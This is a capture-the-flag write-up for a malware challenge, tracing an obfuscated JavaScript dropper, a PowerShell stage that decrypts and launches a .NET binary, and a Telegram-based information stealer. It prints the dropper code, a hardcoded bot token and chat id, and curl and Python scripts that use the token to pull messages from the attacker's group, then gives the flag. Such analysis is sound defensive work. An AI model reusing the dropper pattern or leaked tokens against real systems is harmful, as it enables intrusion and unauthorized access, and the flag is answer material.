Huntress CTF 2025 - Telestealer malware challenge write up
Overview
| Challenge name | Telestealer |
|---|---|
| Solution author | Sudeep Singh |
| Category | Malware |

You can download the binary related to this challenge from here
Password for the archive is: telestealer
I scored a first blood on this challenge :)
In this challenge we are given a large JavaScript file with multiple layers to deobfuscate. The final dropped binary is a .NET-based information stealer that exfiltrates the stolen data to a threat-actor-controlled Telegram bot over the Telegram Bot API.
Stage 1 - JavaScript
In the stage 1 JavaScript, many Base64 string fragments are pushed into an array and joined, and the result is handed to PowerShell as an encoded command. Replacing the launch with an echo dumps the blob; decode it (PowerShell's encoded-command form is Base64 over UTF-16LE text, so decode with that encoding) and analyse the next stage.
```javascript
// Stage 1 (WSH JScript), trimmed: the Base64 blob is rebuilt from fragments.
var parts = [];
parts.push('JGtle...2p0');
parts.push('M3g2V...xdFBZ');
...
var b64cmd = parts.join('');
// Dump the joined blob instead of launching PowerShell with it.
// (The WSH call is WScript.Echo; "Write.Echo" does not exist.)
WScript.Echo(b64cmd);
```
Stage 2 - PowerShell
Below is the Stage 2 PowerShell script.
```powershell
# Hardcoded AES material: 32-byte key (AES-256) and 16-byte IV
$key = [Convert]::FromBase64String('36YQbGeO5yMKil1bWgZb491TLXv68qdTc4dBLIIbdzw=')
$iv = [Convert]::FromBase64String('5g9YP4F0aHlBXK+G3DF5JA==')
$cipher = [Convert]::FromBase64String('4BA40iPA...qavj6g==')
# Aes.Create() defaults to CBC mode with PKCS7 padding
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Key = $key
$aes.IV = $iv
$dec = $aes.CreateDecryptor()
$plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
# Drop the decrypted PE into a world-writable public folder and run it
$out = 'C:\Users\Public\Music\x.exe'
[IO.File]::WriteAllBytes($out, $plain)
Start-Process -FilePath $out
```
Below are the key functionalities of this script.
- Decrypts the Base64-decoded, AES-encrypted blob with the hardcoded key and IV. The key is 32 bytes, so this is AES-256, and `Aes.Create()` uses CBC mode with PKCS7 padding by default, which is what any offline re-implementation has to match.
- Writes the decrypted binary to `C:\Users\Public\Music\x.exe` and executes it.
The decrypted file is a .NET binary; it can be recovered for static analysis by running only the decryption part of the script (or re-implementing it) and skipping the `Start-Process` call.
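The following Python triage script is an added example and is not part of the original write-up or the sample: it pulls the key, IV and ciphertext out of the Stage 2 script with a regex, sanity-checks their sizes, decrypts with the same CBC/PKCS7 defaults that `Aes.Create()` uses (via the third-party `cryptography` package, imported only when `decrypt_payload` is called), and checks whether the result is a PE whose CLR header data directory is populated, i.e. a .NET image, without executing it. The key and IV strings are the ones from the script above; the placeholder ciphertext, the minimal PE header built by `build_sample_pe`, and all function names are constructed for illustration.

```python
import base64
import re
import struct

# Matches `$name = [Convert]::FromBase64String('...')` as written in the Stage 2 script.
B64_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\[Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)")

# Constructed sample: key/IV strings are the ones from the Stage 2 script above; the
# ciphertext is two zero blocks, since the real blob is not reproduced on the page.
PLACEHOLDER_CT = base64.b64encode(bytes(32)).decode()
SAMPLE_SCRIPT = (
    "$key = [Convert]::FromBase64String('36YQbGeO5yMKil1bWgZb491TLXv68qdTc4dBLIIbdzw=')\n"
    "$iv = [Convert]::FromBase64String('5g9YP4F0aHlBXK+G3DF5JA==')\n"
    f"$cipher = [Convert]::FromBase64String('{PLACEHOLDER_CT}')\n"
)


def extract_aes_params(script: str) -> dict:
    """Decode every FromBase64String assignment in the script: {var_name: bytes}."""
    return {name: base64.b64decode(b64) for name, b64 in B64_ASSIGN_RE.findall(script)}


def classify_aes_params(params: dict) -> dict:
    """Sanity-check sizes before decrypting: AES key of 16/24/32 bytes, 16-byte IV,
    ciphertext a whole number of blocks (CBC + PKCS7 always produces that)."""
    key, iv, ct = params["key"], params["iv"], params["cipher"]
    problems = []
    if len(key) not in (16, 24, 32):
        problems.append(f"bad key length {len(key)}")
    if len(iv) != 16:
        problems.append(f"bad IV length {len(iv)}")
    if len(ct) == 0 or len(ct) % 16:
        problems.append(f"ciphertext length {len(ct)} is not a multiple of 16")
    return {"key_bits": len(key) * 8, "ct_blocks": len(ct) // 16, "problems": problems}


def decrypt_payload(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """Same operation as the script's TransformFinalBlock: Aes.Create() defaults to
    CBC with PKCS7 padding. Needs the third-party 'cryptography' package, imported
    here so the rest of the file works without it."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def pe_info(data: bytes) -> dict:
    """Header-only triage of the decrypted bytes: MZ/PE signatures, machine type, and
    whether data directory 14 (the CLR header) is populated, which marks a .NET image."""
    info = {"is_pe": False, "is_dotnet": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    info["is_pe"] = True
    coff = e_lfanew + 4
    info["machine"] = hex(struct.unpack_from("<H", data, coff)[0])
    opt = coff + 20                                    # COFF file header is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_off = opt + (96 if magic == 0x10B else 112)     # data directories: PE32 vs PE32+
    if dd_off > len(data):
        return info
    nrva = struct.unpack_from("<I", data, dd_off - 4)[0]   # NumberOfRvaAndSizes
    clr_dir = dd_off + 14 * 8
    if nrva > 14 and clr_dir + 8 <= len(data):
        rva, size = struct.unpack_from("<II", data, clr_dir)
        info["is_dotnet"] = rva != 0 and size != 0
    return info


def build_sample_pe(dotnet: bool) -> bytes:
    """Constructed minimal PE32 header (not a runnable executable) to exercise pe_info."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE header follows DOS header
    opt = bytearray(96 + 16 * 8)                       # PE32 optional header + 16 directories
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)  # CLR header RVA/size (made up)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)  # i386, one section
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)
```

Against the real script, `extract_aes_params` gives the 32-byte key and 16-byte IV, `decrypt_payload` reproduces `$plain`, and `pe_info` on that output should report `is_pe` and `is_dotnet` as true before the file ever reaches a decompiler.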
Stage 3
This .NET binary is an information stealer that uses Telegram to exfiltrate the stolen information to a threat-actor-controlled Telegram bot.
The screenshot below shows the relevant code section.

The bot token and the chat_id are hardcoded as static strings, as shown in the decompiled code below.
```csharp
private static string TG_Access = "8485770488:AAH8YOjqaRckDPIy7xNwZN2KcaLx6EME-L0";
// Token: 0x04000027 RID: 39
private static string TG_Profileid = "-4862820035";
```
We can retrieve information about the bot by calling the Telegram Bot API `getMe` method with the stolen token:
```
https://api.telegram.org/bot8485770488:AAH8YOjqaRckDPIy7xNwZN2KcaLx6EME-L0/getMe
```
```json
{
  "ok": true,
  "result": {
    "id": 8485770488,
    "is_bot": true,
    "first_name": "st3aler",
    "username": "st38l3r_bot",
    "can_join_groups": true,
    "can_read_all_group_messages": true,
    "supports_inline_queries": false,
    "can_connect_to_business": false,
    "has_main_web_app": false
  }
}
```
To solve this challenge, I forwarded all the messages from this Telegram bot to my own account. One of those messages revealed the flag.
```bash
# Walk message ids 1..100 in the attacker's group and forward each one to my own chat
for i in $(seq 1 100); do
  sleep 2 && echo "$i" && \
  curl "https://api.telegram.org/bot8485770488:AAH8YOjqaRckDPIy7xNwZN2KcaLx6EME-L0/forwardMessage?chat_id=<my_chat_id>&from_chat_id=-4862820035&message_id=$i"
done | tee -a log.txt
```
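The same enumeration as a Python script, added here as an example that is not part of the original write-up: it extracts the token and chat id from the decompiled fragment above, derives the bot id from the token's numeric prefix (the same id `getMe` returns), builds the `forwardMessage` calls, and walks a list of message ids while honouring `429` `retry_after` responses and skipping ids that produce a `400` (Telegram returns a JSON error body with a 4xx status, which `urllib` would otherwise raise on). The bot token and group chat id are the ones shown above; the destination chat id `123456789`, the `SAMPLE_RESPONSES` API bodies served by `fake_fetch_factory`, and all function names are constructed for an offline run.

```python
import json
import re
import time
import urllib.error
import urllib.parse
import urllib.request

# Decompiled C# fragment from the Stage 3 binary (values as shown in the write-up).
DECOMPILED_CS = '''
private static string TG_Access = "8485770488:AAH8YOjqaRckDPIy7xNwZN2KcaLx6EME-L0";
private static string TG_Profileid = "-4862820035";
'''

CS_STRING_FIELD_RE = re.compile(r'string\s+(\w+)\s*=\s*"([^"]*)"')
BOT_TOKEN_RE = re.compile(r"^(\d+):([A-Za-z0-9_-]{35})$")   # <bot id>:<35-char secret>


def extract_telegram_config(src: str) -> dict:
    """Pull the bot token and target chat id out of the decompiled source."""
    fields = dict(CS_STRING_FIELD_RE.findall(src))
    return {"token": fields["TG_Access"], "chat_id": fields["TG_Profileid"]}


def bot_id_from_token(token: str) -> int:
    """The numeric prefix of a bot token is the bot's user id (getMe returns the same id)."""
    m = BOT_TOKEN_RE.match(token)
    if not m:
        raise ValueError("not a Telegram bot token")
    return int(m.group(1))


def api_url(token: str, method: str, **params) -> str:
    query = ("?" + urllib.parse.urlencode(params)) if params else ""
    return f"https://api.telegram.org/bot{token}/{method}{query}"


def http_get(url: str) -> str:
    """Real transport. Telegram answers 4xx with a JSON body, so return that body
    instead of raising, which is what curl in the loop above does implicitly."""
    try:
        with urllib.request.urlopen(url, timeout=15) as resp:
            return resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.read().decode()


def enumerate_forwards(token, my_chat_id, from_chat_id, message_ids, fetch=http_get, sleep=time.sleep):
    """Forward each message id from the attacker's group to my_chat_id.
    ok -> keep the message; 429 -> wait retry_after seconds and retry; anything else
    (e.g. 400 'message to forward not found') -> skip that id."""
    found = {}
    for mid in message_ids:
        while True:
            url = api_url(token, "forwardMessage", chat_id=my_chat_id, from_chat_id=from_chat_id, message_id=mid)
            body = json.loads(fetch(url))
            if body.get("ok"):
                found[mid] = body["result"]
                break
            if body.get("error_code") == 429:
                sleep(body.get("parameters", {}).get("retry_after", 1))
                continue
            break
    return found


# Constructed API responses keyed by message_id, served in order per id (offline stand-in).
SAMPLE_RESPONSES = {
    1: [json.dumps({"ok": True, "result": {"message_id": 501, "text": "new victim: DESKTOP-XYZ"}})],
    2: [json.dumps({"ok": False, "error_code": 400, "description": "Bad Request: message to forward not found"})],
    3: [json.dumps({"ok": False, "error_code": 429, "description": "Too Many Requests: retry after 1",
                    "parameters": {"retry_after": 1}}),
        json.dumps({"ok": True, "result": {"message_id": 502, "text": "credentials dump attached"}})],
}


def fake_fetch_factory(responses: dict):
    """Transport that serves constructed responses by the message_id in the query string."""
    def fetch(url: str) -> str:
        qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
        return responses[int(qs["message_id"][0])].pop(0)
    return fetch


def demo():
    """Run the enumeration offline; '123456789' is a made-up destination chat id."""
    slept = []
    cfg = extract_telegram_config(DECOMPILED_CS)
    fetch = fake_fetch_factory({k: list(v) for k, v in SAMPLE_RESPONSES.items()})
    found = enumerate_forwards(cfg["token"], "123456789", cfg["chat_id"], [1, 2, 3],
                               fetch=fetch, sleep=slept.append)
    return found, slept
```

To run it for real, call `enumerate_forwards(cfg["token"], "<my_chat_id>", cfg["chat_id"], range(1, 101))` with the default transport; the returned dict is the equivalent of `log.txt` above, with the hits already separated from the "not found" responses.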
Flag is: flag{5f5b173825732f5404acf2f680057153}